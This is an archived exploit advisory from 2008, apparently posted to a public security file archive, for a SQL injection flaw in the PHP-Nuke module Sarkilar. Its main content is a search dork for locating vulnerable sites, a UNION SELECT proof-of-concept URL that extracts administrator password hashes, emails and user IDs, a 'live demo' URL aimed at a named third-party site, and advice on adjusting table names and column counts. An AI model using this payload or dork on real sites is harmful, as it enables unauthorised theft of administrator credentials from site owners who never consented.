phpnukesarkilar-sql.txt

phpnukesarkilar-sql.txt: Posted Oct 17, 2008; Authored by r45c4l | Site darkc0de.com; The PHP-Nuke module Sarkilar suffers from a remote SQL injection vulnerability.; tags | exploit, remote, php, sql injection; SHA-256 | 9ea7f554a9533f29f3dbb5a1eef08d9646bc01d33f9b49588a2bf00e2340910a; Download | Favorite | View

phpnukesarkilar-sql.txt

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -Jappan - beenu     # 
#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz        # 
#        and all darkc0de and NikTrix members               ---# 
################################################################ 
# 
# Author: r45c4l (first noticed by echoll)
# 
# Home  : www.darkc0de.com & niktrix.info 
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title:  phpnuke module Sarkilar SQL Injection vulnerabilit
# 
# 
################################################################
#
# d0rk : inurl:?name=Sarkilar
#
################################################################
 
     POC :- 
 
  http://www.site.com/[path]/modules.php?name=Sarkilar&op=showcontent&id=-7+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+nuke_authors--
 
 
     Live Dem0:- 
 
  http://www.hebuname.com/modules.php?name=Sarkilar&op=showcontent&id=-1+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+hebuname_authors--
 
 
  
  Table names can be modified in some sites from nuke_authors to site_authors and in some case number of columns may also be diffrent than the above POC, so u can try to change it manually if the above POC shows any error.

 
########################################################### 
# 
#  Bug discovered : 17 oct 2008 
# 
###########################################################

Top Authors In Last 30 Days

Red Hat 223 files
Ubuntu 57 files
LiquidWorm 23 files
Debian 19 files
indoushka 15 files
Apple 9 files
Google Security Research 5 files
Gentoo 5 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,158)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,830)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,245)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

phpnukesarkilar-sql.txt

phpnukesarkilar-sql.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpnukesarkilar-sql.txt

Share This

phpnukesarkilar-sql.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems